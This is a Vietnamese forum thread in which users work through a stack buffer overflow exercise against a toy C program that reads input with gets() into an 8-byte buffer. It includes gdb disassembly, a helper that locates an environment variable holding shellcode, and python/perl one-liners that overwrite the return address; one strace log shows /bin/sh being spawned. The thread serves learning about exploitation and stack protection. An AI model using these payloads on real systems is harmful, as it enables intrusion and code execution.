@Tal: bạn phải gdb debug xem chuyện gì xảy ra chứ ? Chứ nói vậy ai mà mò dùm bạn?
Trước hết bạn cho vài thông tin:
1.gcc --version
2.gdb ./target
disassemble main
... vv 

gcc --version

gcc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu7)
Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>:	push   %ebp
0x080483a5 <main+1>:	mov    %esp,%ebp
0x080483a7 <main+3>:	sub    $0x10,%esp
0x080483aa <main+6>:	movl   $0x80484a0,(%esp)
0x080483b1 <main+13>:	call   0x804830c <printf@plt>
0x080483b6 <main+18>:	lea    -0x8(%ebp),%eax
0x080483b9 <main+21>:	mov    %eax,(%esp)
0x080483bc <main+24>:	call   0x80482ec <gets@plt>
0x080483c1 <main+29>:	lea    -0x8(%ebp),%eax
0x080483c4 <main+32>:	mov    %eax,0x4(%esp)
0x080483c8 <main+36>:	movl   $0x80484b4,(%esp)
0x080483cf <main+43>:	call   0x804830c <printf@plt>
0x080483d4 <main+48>:	mov    $0x0,%eax
0x080483d9 <main+53>:	leave  
0x080483da <main+54>:	ret    
End of assembler dump.

Dùng 1 chương trình lấy địa chỉ biến môi trường CODE ví dụ là: 0xbffffeb3.
 

Mình dùng 1 chương trình như sau:

Code:

#include <stdlib.h>
#include <stdio.h>

int main(int argc, char **argv) {
  char *addr;
  if (argc < 2) {
    printf("Usage: %s <env var name>\n", argv[0]);
  } else {
    addr = getenv(argv[1]);
    if (addr == NULL) {
      printf("The environment variable %s does not exist\\n", argv[1]);
    } else {
      printf("%s is located at %p\n", argv[1], addr);
    }
  }
  return 0;
}

 

Nhìn đoạn disassembly của bạn, mình đề nghị bạn chạy thử cái này xem:
python -c 'print "A"*12 + "\xAA\xBB\xXCC\xDD"' |./vul

Lưuý: \xAA\xBB\xCC\xDD là địa chỉ biến môi trường CODE chứa shellcode của bạn
 

Ý mình là làm sao bạn biết địa chỉ biến môi trường khi bạn chạy cái chương trình lấy ở trên và khi chạy cái getname.out của bạn là trùng nhau? Nếu nó khác thì sao?
 

#include <string.h>
#include <stdio.h>

int main(int argc, char **argv)
{
char name[8];
printf("What is your name: ");
gets(name);
printf("Aha, your name is: %s\n",name);
return 0;
}
@Ta 

#include <string.h>
#include <stdio.h>

int main(int argc, char **argv)
{
char name[8];
printf("What is your name: ");
gets(name);
printf("Aha, your name is: %s\n",name);
return 0;
}
@Ta 

l: Đề nghị bạn đọc kỹ lại đoạn code của bạn xem độ dài buffer là bao nhiêu trước khi tiếp tục  

(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>: push %ebp
0x080483a5 <main+1>: mov %esp,%ebp
0x080483a7 <main+3>: sub $0x10,%esp
0x080483aa <main+6>: movl $0x80484a0,(%esp)
0x080483b1 <main+13>: call 0x804830c <printf@plt>
0x080483b6 <main+18>: lea -0x8(%ebp),%eax
0x080483b9 <main+21>: mov %eax,(%esp)
0x080483bc <main+24>: call 0x80482ec <gets@plt>
0x080483c1 <main+29>: lea -0x8(%ebp),%eax
0x080483c4 <main+32>: mov %eax,0x4(%esp)
0x080483c8 <main+36>: movl $0x80484b4,(%esp)
0x080483cf <main+43>: call 0x804830c <printf@plt>
0x080483d4 <main+48>: mov $0x0,%eax
0x080483d9 <main+53>: leave
0x080483da <main+54>: ret
End of assembler dump. 

(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>: push %ebp
0x080483a5 <main+1>: mov %esp,%ebp
0x080483a7 <main+3>: sub $0x18,%esp
0x080483aa <main+6>: and $0xfffffff0,%esp
0x080483ad <main+9>: mov $0x0,%eax
0x080483b2 <main+14>: sub %eax,%esp
0x080483b4 <main+16>: movl $0x80484b4,(%esp)
0x080483bb <main+23>: call 0x80482ec <printf@plt>
0x080483c0 <main+28>: lea -0x8(%ebp),%eax
0x080483c3 <main+31>: mov %eax,(%esp)
0x080483c6 <main+34>: call 0x80482cc <gets@plt>
0x080483cb <main+39>: lea -0x8(%ebp),%eax
0x080483ce <main+42>: mov %eax,0x4(%esp)
0x080483d2 <main+46>: movl $0x80484c8,(%esp)
0x080483d9 <main+53>: call 0x80482ec <printf@plt>
0x080483de <main+58>: mov $0x0,%eax
0x080483e3 <main+63>: leave
0x080483e4 <main+64>: ret

m@h:~$ python -c 'print "A" * 12 + "\x38\xf0\xff\xbf"' | ~/test
What is your name: Aha, your name is: AAAAAAAAAAAA8���
Thu Aug 28 22:51:48 ICT 2008

 

@Tal: Bạn có thể giải thích tại sao khi compile, bạn cho thằng -mpreferred-stack-boundary=2 được ko?
Cái này có lẽ liên quan đến memory allocate của gcc, dung lượng stack frame đc gcc cấp sẽ thay đổi phụ thuộc vào thuộc tính này ??
Trong trường hợp này là
Code:

0x080483a7 <main+3>:	sub    $0x10,%esp

 

(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>: lea 0x4(%esp),%ecx
0x080483a8 <main+4>: and $0xfffffff0,%esp
0x080483ab <main+7>: pushl -0x4(%ecx)
0x080483ae <main+10>: push %ebp
0x080483af <main+11>: mov %esp,%ebp
0x080483b1 <main+13>: push %ecx
0x080483b2 <main+14>: sub $0x24,%esp
0x080483b5 <main+17>: movl $0x80484b0,(%esp)
0x080483bc <main+24>: call 0x804830c <printf@plt>
0x080483c1 <main+29>: lea -0xc(%ebp),%eax
0x080483c4 <main+32>: mov %eax,(%esp)
0x080483c7 <main+35>: call 0x80482ec <gets@plt>
0x080483cc <main+40>: lea -0xc(%ebp),%eax
0x080483cf <main+43>: mov %eax,0x4(%esp)
0x080483d3 <main+47>: movl $0x80484c4,(%esp)
0x080483da <main+54>: call 0x804830c <printf@plt>
0x080483df <main+59>: mov $0x0,%eax
0x080483e4 <main+64>: add $0x24,%esp
0x080483e7 <main+67>: pop %ecx
0x080483e8 <main+68>: pop %ebp
0x080483e9 <main+69>: lea -0x4(%ecx),%esp
0x080483ec <main+72>: ret
End of assembler dump.
 

Tal@vxer:~/Documents/Research$ export CODE=`cat shellcode`
Tal@vxer:~/Documents/Research$ ./getenv CODE
CODE is located at 0xbfffff5a
Tal@vxer:~/Documents/Research$ ./getname 
What is your name: hello
Aha, your name is: hello
Tal@vxer:~/Documents/Research$ perl -e "A"x12 . "\x5a\xff\xff\xbf" | ./getname 
What is your name: Aha, your name is: ����������P���
Tal@vxer:~/Documents/Research$

$ perl -e "A"x12 . "\x5a\xff\xff\xbf" | strace ./getname
 

execve("./getname", ["./getname"], [/* 38 vars */]) = 0
brk(0) = 0x804a000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe1000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50236, ...}) = 0
mmap2(NULL, 50236, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd4000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e85000
mmap2(0xb7fce000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149) = 0xb7fce000
mmap2(0xb7fd1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd1000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e84000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e846b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fce000, 4096, PROT_READ) = 0
munmap(0xb7fd4000, 50236) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000
fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
read(0, "AAAAAAAAAAAAZ\377\377\277", 1024) = 16
read(0, "", 1024) = 0
write(1, "What is your name: Aha, your nam"..., 55What is your name: Aha, your name is: AAAAAAAAAAAAZ���
) = 55
execve("��", ["\234\255\24"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0
brk(0) = 0x805e000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe1000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50236, ...}) = 0
mmap2(NULL, 50236, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd4000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e85000
mmap2(0xb7fce000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149) = 0xb7fce000
mmap2(0xb7fd1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd1000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e84000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e846b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fce000, 4096, PROT_READ) = 0
munmap(0xb7fd4000, 50236) = 0
getpid() = 6412
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
geteuid32() = 1000
getppid() = 6411
brk(0) = 0x805e000
brk(0x807f000) = 0x807f000
getcwd("/home/haprog/Documents/Research", 4096) = 32
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffffd18) = -1 EINVAL (Invalid argument)
rt_sigaction(SIGINT, NULL, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTERM, {SIG_DFL}, NULL, 8) = 0
read(0, "", 8192) = 0
exit_group(0) = ?
Process 6412 detached
 

@Cognac: lúc đó sẽ có hai trường hợp:

- có SSP http://www.trl.ibm.com/projects/security/ssp/) hay không? nếu có SSP thì đối với đoạn mã này mặc dù bị lỗi nhưng sẽ kô thể khai thác được, chỉ có làm cho chương trình nó crash thôi.

- không có SSP (compile với option -fno-stack-protector), lúc này mã dissasembly của đoạn chương trình trên sẽ như sau:

(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>: lea 0x4(%esp),%ecx
0x080483a8 <main+4>: and $0xfffffff0,%esp
0x080483ab <main+7>: pushl -0x4(%ecx)
0x080483ae <main+10>: push %ebp
0x080483af <main+11>: mov %esp,%ebp
0x080483b1 <main+13>: push %ecx
0x080483b2 <main+14>: sub $0x24,%esp
0x080483b5 <main+17>: movl $0x80484b0,(%esp)
0x080483bc <main+24>: call 0x804830c <printf@plt>
0x080483c1 <main+29>: lea -0xc(%ebp),%eax
0x080483c4 <main+32>: mov %eax,(%esp)
0x080483c7 <main+35>: call 0x80482ec <gets@plt>
0x080483cc <main+40>: lea -0xc(%ebp),%eax
0x080483cf <main+43>: mov %eax,0x4(%esp)
0x080483d3 <main+47>: movl $0x80484c4,(%esp)
0x080483da <main+54>: call 0x804830c <printf@plt>
0x080483df <main+59>: mov $0x0,%eax
0x080483e4 <main+64>: add $0x24,%esp
0x080483e7 <main+67>: pop %ecx
0x080483e8 <main+68>: pop %ebp
0x080483e9 <main+69>: lea -0x4(%ecx),%esp
0x080483ec <main+72>: ret
End of assembler dump. 

Hơi khó exploit một chút, nhưng vẫn có thể exploit được. Bồ thử tìm hiểu cách exploit xem, gợi ý: chú ý vào ecx.

--m 

python -c 'print "A" * 8 + "\xb2\x83\x04\x08" + "\xAA\xBB\XCC\XDD"' | ./vul

PS: Tui ko nhớ cách input dạng này trong gdb khi run, bác mrro chỉ tui được ko?
 

1. python -c 'print "A" * 8 + "\xb2\x83\x04\x08" + "\xAA\xBB\XCC\XDD"' > exp

2. gdb> run < exp